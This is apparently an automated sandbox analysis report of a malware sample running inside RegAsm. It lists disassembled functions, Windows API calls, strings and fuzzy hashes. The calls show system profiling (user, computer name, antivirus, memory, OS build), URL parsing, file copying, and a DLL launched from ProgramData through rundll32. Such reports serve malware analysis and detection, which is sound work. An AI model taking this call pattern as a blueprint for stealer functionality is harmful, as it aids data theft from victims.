Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 0041061D
Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410645
Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410650

Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,004170BA,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 004105BD

Part of subcall function 00411C4A: GetSystemTime.KERNEL32(?,00436701,?), ref: 00411C79

Part of subcall function 004105C7: lstrcpyA.KERNEL32(00000000,?,0000000C,004175E9,004366DA), ref: 004105F5
Part of subcall function 004105C7: lstrcatA.KERNEL32(?,?), ref: 004105FF

ShellExecuteEx.SHELL32(?), ref: 00412B84

Strings

.dll, xrefs: 004129ED
C:\ProgramData\, xrefs: 00412995
C:\Windows\system32\rundll32.exe, xrefs: 00412AE3
"" , xrefs: 00412A32

Memory Dump Source

Source File: 00000006.00000002.2048308156.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.2048308156.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrcat$ExecuteShellSystemTimelstrlen
String ID: "" $.dll$C:\ProgramData\$C:\Windows\system32\rundll32.exe
API String ID: 2215929589-2108736111
Opcode ID: c76b9356db023fdea971dc893b2b920fd300fe1c02b79897c04016921bfa74e0
Instruction ID: fcd8ae3be328f2bece2d36ab058f070ab7b5b8f350f6457e4fbb623da5ab610c
Opcode Fuzzy Hash: c76b9356db023fdea971dc893b2b920fd300fe1c02b79897c04016921bfa74e0
Instruction Fuzzy Hash: 4871EE71E40119ABCF10FFA6DD466CDB7B5AF04308F51406BF510B7191DBB8AE8A8B98

Function 00411684 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 60stringCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 004116CE

Part of subcall function 004123D5: malloc.MSVCRT ref: 004123DA
Part of subcall function 004123D5: strncpy.MSVCRT ref: 004123EB

lstrcatA.KERNEL32(?,00000000,?,?,?,?,?), ref: 004116F6
lstrcatA.KERNEL32(?,00436ECC,?,?,?,?,?), ref: 00411713
GetCurrentHwProfileA.ADVAPI32(?), ref: 0041169F

Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D

Strings

Unknown, xrefs: 0041173C

Memory Dump Source

Source File: 00000006.00000002.2048308156.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.2048308156.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: lstrcat$CurrentProfile_memsetlstrcpymallocstrncpy
String ID: Unknown
API String ID: 2781187439-1654365787
Opcode ID: ab585756b44732b0c52de9de7319f605c52bcc59fa939e737159a870399f43be
Instruction ID: 5196d0f985b73c0c8bd0bad26c43f83b5151f3b6dc85e60399ef39d4da867d2e
Opcode Fuzzy Hash: ab585756b44732b0c52de9de7319f605c52bcc59fa939e737159a870399f43be
Instruction Fuzzy Hash: 6F118671A0011CABCB21EB65DD86FDD73B8AB18704F4004A6B645F7191DAB8AFC88F58

Function 00411119 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 45memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104,?,Keyboard Languages: ,00436910,Display Resolution: ,004368F4,00000000,User Name: ,004368E4,00000000,Computer Name: ,004368D0,AV: ,004368C4,Install Date: ), ref: 00411131
HeapAlloc.KERNEL32(00000000), ref: 00411138
GlobalMemoryStatusEx.KERNEL32(?,?,00000040), ref: 00411154
wsprintfA.USER32 ref: 0041117A

Strings

%d MB, xrefs: 00411174

Memory Dump Source

Source File: 00000006.00000002.2048308156.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.2048308156.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Heap$AllocGlobalMemoryProcessStatuswsprintf
String ID: %d MB
API String ID: 3644086013-2651807785
Opcode ID: 8862206487a5735529afe943f838936f5b8579a15e145366872ddc586f9bf33b
Instruction ID: b0b061f5290e25b68b6f7a4002290a0ac05d972f49bd8262d04e688218eddb93
Opcode Fuzzy Hash: 8862206487a5735529afe943f838936f5b8579a15e145366872ddc586f9bf33b
Instruction Fuzzy Hash: 7801A9B1E00218ABEB08DFB4DC45EEEB7B9EF08705F44006AF602D7290EA75D9818759

Function 00410B30 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 40memoryregistryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104,00000000,?,?,?,00413E95,Windows: ,004368A0), ref: 00410B44
HeapAlloc.KERNEL32(00000000,?,?,?,00413E95,Windows: ,004368A0), ref: 00410B4B
RegOpenKeyExA.KERNEL32(80000002,00000000,00020119,00436888,?,?,?,00413E95,Windows: ,004368A0), ref: 00410B79
RegQueryValueExA.KERNEL32(00436888,00000000,00000000,00000000,000000FF,?,?,?,00413E95,Windows: ,004368A0), ref: 00410B95

Strings

Windows 11, xrefs: 00410B5C

Memory Dump Source

Source File: 00000006.00000002.2048308156.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.2048308156.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Heap$AllocOpenProcessQueryValue
String ID: Windows 11
API String ID: 3676486918-2517555085
Opcode ID: e3368c902befc4cf7a45888ed36aa8236a31042c29ba286c6ff82d11e2c4ce16
Instruction ID: c636f12a4b9fd3341eb7223670fa9a8d4496e2c02347a6f2be12f88bf3247473
Opcode Fuzzy Hash: e3368c902befc4cf7a45888ed36aa8236a31042c29ba286c6ff82d11e2c4ce16
Instruction Fuzzy Hash: 1AF06875600304FBFF149BD1DC4AFAB7A7EEB4470AF1410A5F601D5190E7B6AA909714

Function 00410BA9 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 36memoryregistryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104,00000000,?,?,?,00410C1B,00410B58,?,?,?,00413E95,Windows: ,004368A0), ref: 00410BBD
HeapAlloc.KERNEL32(00000000,?,?,?,00410C1B,00410B58,?,?,?,00413E95,Windows: ,004368A0), ref: 00410BC4
RegOpenKeyExA.KERNEL32(80000002,00000000,00020119,00436888,?,?,?,00410C1B,00410B58,?,?,?,00413E95,Windows: ,004368A0), ref: 00410BE2
RegQueryValueExA.KERNEL32(00436888,CurrentBuildNumber,00000000,00000000,00000000,000000FF,?,?,?,00410C1B,00410B58,?,?,?,00413E95,Windows: ), ref: 00410BFD

Strings

CurrentBuildNumber, xrefs: 00410BF5

Memory Dump Source

Source File: 00000006.00000002.2048308156.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.2048308156.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Heap$AllocOpenProcessQueryValue
String ID: CurrentBuildNumber
API String ID: 3676486918-1022791448
Opcode ID: c84c6eb54361118da4c3cf5dc7048b6cc90d818083839d71d976e1457e1e6126
Instruction ID: adfa9e2f60a12e4d5f9b95a3627e322926d469c0f3b43989f67d349f50e983ff
Opcode Fuzzy Hash: c84c6eb54361118da4c3cf5dc7048b6cc90d818083839d71d976e1457e1e6126
Instruction Fuzzy Hash: E9F09075640304BBEF159B90DC0AFAF7A7EEB44B06F240055F601A50A0E6B25A909B50

Function 0041566F Relevance: 7.6, APIs: 5, Instructions: 107registrystringCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 004156A4
RegOpenKeyExA.KERNEL32(80000001,00000000,00020119,?,?,00000000,?), ref: 004156C4
RegQueryValueExA.ADVAPI32(?,00000000,00000000,?,000000FF), ref: 004156EA
lstrcatA.KERNEL32(?,?), ref: 00415725
lstrcatA.KERNEL32(?), ref: 00415738

Memory Dump Source

Source File: 00000006.00000002.2048308156.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.2048308156.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: lstrcat$OpenQueryValue_memset
String ID:
API String ID: 3357907479-0
Opcode ID: 61c845370fa5e20ce0e4bed28fcb2d467033b3eb1257b194b560fd969d8f00f9
Instruction ID: 247fa685f6815e34cff7f8df4b350b2d93bc7a81ee75f5ea83cfe721da60279c
Opcode Fuzzy Hash: 61c845370fa5e20ce0e4bed28fcb2d467033b3eb1257b194b560fd969d8f00f9
Instruction Fuzzy Hash: 6941CE7194011D9FDF24EF60EC86EE8777ABB18309F4004AAB109A31A0EE759FC59F94

Function 0041BC21 Relevance: 7.6, APIs: 5, Instructions: 99fileCOMMON

Download Yara Rule

APIs

SetFilePointer.KERNEL32(?,00000000,00000000,00000001,767474F0,?,0041CBEE,?,0041CC7C,00000000,06400000,00000003,00000000,0041757F,.exe,00436C5C), ref: 0041BC6E
CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000,767474F0,?,0041CBEE,?,0041CC7C,00000000,06400000,00000003,00000000), ref: 0041BCA6

Memory Dump Source

Source File: 00000006.00000002.2048308156.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.2048308156.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: File$CreatePointer
String ID:
API String ID: 2024441833-0
Opcode ID: c2a5f8e1d00489231e5594f9a747e25d59c8a13e659a0516d0e6ae57d101117a
Instruction ID: ff1efad9a67633d22899531c3285d4c1b5d125596630838d4b1aaea72c6dc67b
Opcode Fuzzy Hash: c2a5f8e1d00489231e5594f9a747e25d59c8a13e659a0516d0e6ae57d101117a
Instruction Fuzzy Hash: CA31A2F0504B049FDB348F24A9D4BA37AE8EB15314F108E2FF19682691D33898C49B99

Function 00404AB6 Relevance: 7.6, APIs: 5, Instructions: 50stringnetworkCOMMON

Download Yara Rule

APIs

??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00404AE8
??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00404AEE
??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00404AF4
lstrlenA.KERNEL32(000000FF,00000000,?), ref: 00404B06
InternetCrackUrlA.WININET(000000FF,00000000), ref: 00404B0E

Memory Dump Source

Source File: 00000006.00000002.2048308156.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.2048308156.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: CrackInternetlstrlen
String ID:
API String ID: 1274457161-0
Opcode ID: f25c82f9083139f9dc305e99f373a1749f43e790606f1cfdd691ee0f4a79a4b6
Instruction ID: f1c5382da97c9dd65e4db87c3c806c9c9b4e03b01775002e3606c6f6cd357758
Opcode Fuzzy Hash: f25c82f9083139f9dc305e99f373a1749f43e790606f1cfdd691ee0f4a79a4b6
Instruction Fuzzy Hash: E9011B72D00218ABDF149BA9DC45ADEBFB8AF55330F10821AF925F72E0DB745A058B94

Function 004083D9 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 87libraryCOMMON

Download Yara Rule

APIs

GetEnvironmentVariableA.KERNELBASE(C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;,0000FFFF,?,?,?,?,?,?,?,?,?,?,0040DB0A), ref: 004083F2

Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D

Part of subcall function 00410549: lstrlenA.KERNEL32(?,?,00417174,004366CF,004366CE,?,?,?,?,0041858F), ref: 0041054F
Part of subcall function 00410549: lstrcpyA.KERNEL32(00000000,00000000,?,00417174,004366CF,004366CE,?,?,?,?,0041858F), ref: 00410581

Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 0041061D
Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410645
Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410650

Part of subcall function 004105C7: lstrcpyA.KERNEL32(00000000,?,0000000C,004175E9,004366DA), ref: 004105F5
Part of subcall function 004105C7: lstrcatA.KERNEL32(?,?), ref: 004105FF

Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,004170BA,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 004105BD

SetEnvironmentVariableA.KERNEL32(?,00437194,C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;,004367C3,?,?,?,?,?,?,?,?,0040DB0A), ref: 00408447
LoadLibraryA.KERNEL32(?,?,?,?,?,?,?,?,0040DB0A), ref: 0040845B

Strings

C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;, xrefs: 004083E6, 004083EB, 00408405

Memory Dump Source

Source File: 00000006.00000002.2048308156.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.2048308156.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: lstrcpy$EnvironmentVariablelstrcatlstrlen$LibraryLoad
String ID: C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;
API String ID: 2929475105-2812842227
Opcode ID: 04dcee5354247dbc29cf1765c19ad916d25bce8febd7e9a612e053264f62c16e
Instruction ID: 1d1035b7872eafe5bc2acfcfd9c5443481a9431a5cd399c5b03dff48eed801cb
Opcode Fuzzy Hash: 04dcee5354247dbc29cf1765c19ad916d25bce8febd7e9a612e053264f62c16e
Instruction Fuzzy Hash: 20315C71940714ABCF16EF2AED0245D7BA2AB48706F10607BF440B72B0DB7A1A81CF89

Function 00416DC6 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 55stringCOMMON

Download Yara Rule

APIs

__EH_prolog3_catch.LIBCMT ref: 00416DCD
lstrlenA.KERNEL32(?,0000001C), ref: 00416DD8
StrCmpCA.SHLWAPI(?,ERROR), ref: 00416E5C

Strings

ERROR, xrefs: 00416E54

Memory Dump Source

Source File: 00000006.00000002.2048308156.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.2048308156.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: H_prolog3_catchlstrlen
String ID: ERROR
API String ID: 591506033-2861137601
Opcode ID: 987378090a3b2abee121885682ea4995d8af358216b926a009c89c00a445330c
Instruction ID: af559da7a52deda925aca90371b7d636d26c87dd73bd3b1907a7f448f6be4e16
Opcode Fuzzy Hash: 987378090a3b2abee121885682ea4995d8af358216b926a009c89c00a445330c
Instruction Fuzzy Hash: 6F119371900509AFCB40FF75D9025DDBBB1BF04308B90513AE414E3591E739EAA98FC9

Function 0041224A Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 36COMMON

Download Yara Rule

APIs

OpenProcess.KERNEL32(00000410,00000000,=A,00000000,?), ref: 0041226C
K32GetModuleFileNameExA.KERNEL32(00000000,00000000,?,00000104), ref: 00412287
CloseHandle.KERNEL32(00000000), ref: 0041228E

Strings

=A, xrefs: 0041225D, 00412262

Memory Dump Source

Source File: 00000006.00000002.2048308156.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.2048308156.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: CloseFileHandleModuleNameOpenProcess
String ID: =A
API String ID: 3183270410-2399317284
Opcode ID: a5843cda12b70cc7bcbf256d8a6036821e346dccf5e361165451a22e509f8efe
Instruction ID: 00f88837b3f4b8dbd17d966d98a560f1caae43d713f472eddac2d47ecb876e1e
Opcode Fuzzy Hash: a5843cda12b70cc7bcbf256d8a6036821e346dccf5e361165451a22e509f8efe
Instruction Fuzzy Hash: D8F0B471600218ABDB24EB68DC45FEE7BBC9B48B08F00006AF645D7180EEB5DAC5CB55

Function 0040B332 Relevance: 6.2, APIs: 4, Instructions: 196filestringCOMMON

Download Yara Rule

APIs

Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D

Part of subcall function 00411C4A: GetSystemTime.KERNEL32(?,00436701,?), ref: 00411C79

Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 0041061D
Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410645
Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410650

Part of subcall function 004105C7: lstrcpyA.KERNEL32(00000000,?,0000000C,004175E9,004366DA), ref: 004105F5
Part of subcall function 004105C7: lstrcatA.KERNEL32(?,?), ref: 004105FF

Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,004170BA,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 004105BD

CopyFileA.KERNEL32(?,?,00000001,00437414,0043681B,?,?,?), ref: 0040B3D7
lstrlenA.KERNEL32(?), ref: 0040B529
lstrlenA.KERNEL32(?), ref: 0040B544
